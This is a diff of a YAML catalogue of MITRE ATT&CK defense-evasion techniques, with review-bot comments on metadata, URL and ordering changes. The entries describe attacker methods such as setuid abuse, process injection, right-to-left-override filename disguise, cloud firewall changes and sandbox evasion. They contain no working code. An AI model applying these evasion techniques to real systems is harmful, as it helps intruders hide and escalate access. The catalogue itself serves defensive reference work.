description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6276,12 +6406,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6313,11 +6442,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6358,11 +6486,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6418,12 +6545,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6480,7 +6606,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6516,7 +6641,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6549,13 +6674,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6617,10 +6740,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6678,7 +6800,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6720,7 +6841,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6779,41 +6900,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6822,20 +6912,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
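Review bot: the T1578.003 object is deleted and re-emitted with a different key order (platforms, domains and external_references moved below the data sources), so a small metadata refresh shows as a 70-line rewrite. Buried inside the reorder are three substantive changes that deserve a mention in the commit message: the Mandiant M-Trends 2020 reference now points at `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` instead of the content.fireeye.com URL, `x_mitre_permissions_required` is dropped, and `revoked: false` plus an `x_mitre_contributors` entry are added. A generator that emits keys in a stable order would keep future refreshes reviewable.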
@@ -6865,7 +6985,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6900,8 +7020,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6992,12 +7110,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -7005,19 +7122,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
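Review bot: the new description string ends with a trailing space before the closing quote at `or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`; it is harmless in YAML but will show up as a stray space wherever the description is rendered, so strip it, or accept it as a verbatim copy of the upstream text and say so. The `x_mitre_detection` line is unchanged and still covers both creation and modification of security groups and firewall rules, which matches the broadened description.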
@@ -7026,7 +7149,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -7049,9 +7172,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -7084,7 +7206,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -7103,8 +7225,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -7135,7 +7255,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7165,12 +7285,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7196,9 +7314,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
@@ -7229,14 +7346,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7256,6 +7372,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7263,7 +7380,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7279,34 +7395,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
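Review bot: the external_references for T1550.003 are reordered (CERT-EU first, ADSecurity after GentilKiwi), which makes this hunk look bigger than the actual change: the GentilKiwi Pass the Ticket URL is swapped to a web.archive.org snapshot with the retrieval date updated to September 12, 2024, and `x_mitre_modified_by_ref` moves to the bottom of the object. The archive swap is the right fix for a dead link; the plain-`http://` reference in the same block, `http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf`, is a candidate for the same treatment if it no longer resolves.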
@@ -7372,7 +7489,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7411,7 +7527,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7460,8 +7576,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7512,7 +7626,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7533,7 +7647,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7600,7 +7713,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7623,7 +7735,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7644,8 +7756,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7706,11 +7816,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7775,7 +7884,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7799,7 +7907,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7843,8 +7951,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7900,7 +8006,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7924,7 +8030,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -8015,40 +8120,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -8060,6 +8136,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -8070,8 +8150,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -8081,9 +8167,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
